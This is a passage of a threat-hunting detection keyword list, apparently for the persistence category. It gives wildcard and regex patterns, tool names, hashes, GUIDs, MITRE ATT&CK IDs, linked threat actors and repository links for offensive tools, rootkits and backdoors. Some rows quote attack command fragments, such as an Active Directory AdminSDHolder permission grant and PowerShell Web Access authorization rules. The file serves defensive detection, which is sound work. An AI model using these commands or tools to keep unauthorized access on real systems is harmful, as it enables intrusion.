856*abpttsclient.py*.{0,1000}abpttsclient\.py.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS11N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z33044
857*ABPTTSClient-log.txt*.{0,1000}ABPTTSClient\-log\.txt.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS11N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z33045
858*abpttsfactory.py*.{0,1000}abpttsfactory\.py.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS11N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z33046
859*acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0*.{0,1000}acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z33104
860*ACE_Get-KerberosTicketCache.ps1*.{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt11N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z33120
861*action=SchTaskCOMHijack *.{0,1000}action\=SchTaskCOMHijack\s.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z33154
862*add_malicious_pager*.{0,1000}add_malicious_pager.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z33303
863*add_malicious_pre_commit*.{0,1000}add_malicious_pre_commit.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z33304
864*addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc*.{0,1000}addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#filehashN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z33320
865*Add-KeeThiefLurker *.{0,1000}Add\-KeeThiefLurker\s.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z33334
866*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*.{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}offensive_tool_keywordpowerviewmodifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.T1046 - T1087.001 - T1016TA0007 - TA0008 - TA0009N/ADispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDAPersistencehttps://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps110N/AN/A1011832017-10-26T20:35:53Z2017-07-07T13:34:07Z33347
867*addPreloadToPrivesc*.{0,1000}addPreloadToPrivesc.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z33354
868*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*.{0,1000}Add\-PswaAuthorizationRule\s\-UsernName\s\\.{0,1000}\s\-ComputerName\s\\.{0,1000}\s\-ConfigurationName\s\\.{0,1000}greyware_tool_keywordpowershellallows all users to access all computers with a specified configurationT1053TA0003N/AN/APersistenceN/A10N/Agreyware tool - risks of False positive !710N/AN/AN/AN/A33361
869*Add-PswaAuthorizationRule*-ComputerName *.{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-ComputerName\s.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A33362
870*Add-PswaAuthorizationRule*-UserName *.{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-UserName\s.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A33363
871*Add-PswaAuthorizationRule*-UserName *.{0,1000}Add\-PswaAuthorizationRule.{0,1000}\-UserName\s.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A33364
872*Add-RemoteRegBackdoor*.{0,1000}Add\-RemoteRegBackdoor.{0,1000}offensive_tool_keywordAD exploitation cheat sheetUsing DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.T1558.001 - T1078.002 - T1550.003TA0008 - TA0009 - TA0003N/ABlack BastaPersistencehttps://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference11N/AN/AN/AN/AN/AN/AN/AN/A33368
873*Add-RemoteRegBackdoor*.{0,1000}Add\-RemoteRegBackdoor.{0,1000}offensive_tool_keywordDAMPThe Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.T1222 - T1222.002 - T1548 - T1548.002TA0005 N/AN/APersistencehttps://github.com/HarmJ0y/DAMP11N/AN/A104378792019-07-25T21:18:37Z2018-04-06T22:13:58Z33369
874*Add-WindowsFeature Hyper-V -IncludeManagementTools*.{0,1000}Add\-WindowsFeature\sHyper\-V\s\-IncludeManagementTools.{0,1000}greyware_tool_keywordpowershellenabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machineT1560.003 - T1547 - T1059TA0003 - TA0002N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A77N/AN/AN/AN/A33388
875*ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079*.{0,1000}ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z33560
876*AEC32155-D589-4150-8FE7-2900DF4554C8*.{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#GUIDprojectN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z33572
877*aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52*.{0,1000}aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z33579
878*Aegrah/PANIX*.{0,1000}Aegrah\/PANIX.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX11#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z33591
879*af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d*.{0,1000}af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z33636
880*afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd*.{0,1000}afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z33651
881*AFB848D0-68F8-42D1-A1C8-99DFBE034FCF*.{0,1000}AFB848D0\-68F8\-42D1\-A1C8\-99DFBE034FCF.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z33653
882*All Done! Hack the planet!*.{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z33793
883*--assemblyargs AntiVirus AppLocker*.{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z34146
884*ATK/Sandman-A*.{0,1000}ATK\/Sandman\-A.{0,1000}signature_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#AvsignatureN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z34189
885*ATK/Seatbelt-A*.{0,1000}ATK\/Seatbelt\-A.{0,1000}signature_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#AvsignatureN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z34190
886*Attempting to add Sticky Keys backdoor to registry*.{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z34235
887*Attempting to add Sticky Keys backdoor to registry*.{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z34236
888*autodiscover/brute.go*.{0,1000}autodiscover\/brute\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler11N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z34295
889*b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4*.{0,1000}b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34428
890*b17a74e58d85f8d1ecfa38831fbca197c8edeb92e6c3a856e8c6b1030149ebe7*.{0,1000}b17a74e58d85f8d1ecfa38831fbca197c8edeb92e6c3a856e8c6b1030149ebe7.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z34491
891*b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a*.{0,1000}b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34494
892*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*.{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}offensive_tool_keywordWMIPersistenceAn example of how to perform WMI Event Subscription persistence using C#T1547.008 - T1084 - T1053 - T1059.003TA0003 - TA0004 - TA0002N/AN/APersistencehttps://github.com/mdsecactivebreach/WMIPersistence10#filehashN/AN/A2113302019-05-29T09:48:46Z2019-05-29T09:40:01Z34538
893*b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44*.{0,1000}b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34554
894*b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd*.{0,1000}b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710#filehashN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z34558
895*b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6*.{0,1000}b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34599
896*b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2*.{0,1000}b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#filehashN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z34612
897*B362EC25-70BD-4E6C-9744-173D20FDA392*.{0,1000}B362EC25\-70BD\-4E6C\-9744\-173D20FDA392.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#GUIDprojectN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z34624
898*b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617*.{0,1000}b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34691
899*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*.{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10#filehashN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z34715
900*b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e*.{0,1000}b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34803
901*b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489*.{0,1000}b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34821
902*b6a919990fe576710a4ce3ed46cc40d91ce4d59e547af8c50b739920987b7e44*.{0,1000}b6a919990fe576710a4ce3ed46cc40d91ce4d59e547af8c50b739920987b7e44.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z34871
903*b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f*.{0,1000}b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34891
904*b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e*.{0,1000}b6fb74cf4bcf1ad06bc0424af481dff96e98cf06803d450c4d9a3b621b63966e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34895
905*b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf*.{0,1000}b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z34923
906*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*.{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#filehash #linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z34951
907*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*.{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#filehashN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z35046
908*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*.{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#filehashN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z35047
909*b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096*.{0,1000}b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35053
910*b96e491df170080d656cf7e24dd085bc15e044e72c5bbbd6abbe3bcc230b328d*.{0,1000}b96e491df170080d656cf7e24dd085bc15e044e72c5bbbd6abbe3bcc230b328d.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z35074
911*b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5*.{0,1000}b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35103
912*ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404*.{0,1000}ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z35123
913*Backdoor has been set up successfully*.{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z35156
914*Backdoor is already removed :)*.{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z35157
915*Backdoor is already set up ;)*.{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z35158
916*Backdoor.Linux.Spyssh.J*.{0,1000}Backdoor\.Linux\.Spyssh\.J.{0,1000}signature_keywordsshdoorOpenssh backdoorT1059.003 - T1105 - T1071.001TA0011 - TA0003N/AFANCY BEARPersistencehttps://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf10#AvsignatureN/A109N/AN/AN/AN/A35174
917*Backdoor.Linux.Sshdkit*.{0,1000}Backdoor\.Linux\.Sshdkit.{0,1000}signature_keywordsshdoorOpenssh backdoorT1059.003 - T1105 - T1071.001TA0011 - TA0003N/AFANCY BEARPersistencehttps://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf10#AvsignatureN/A109N/AN/AN/AN/A35175
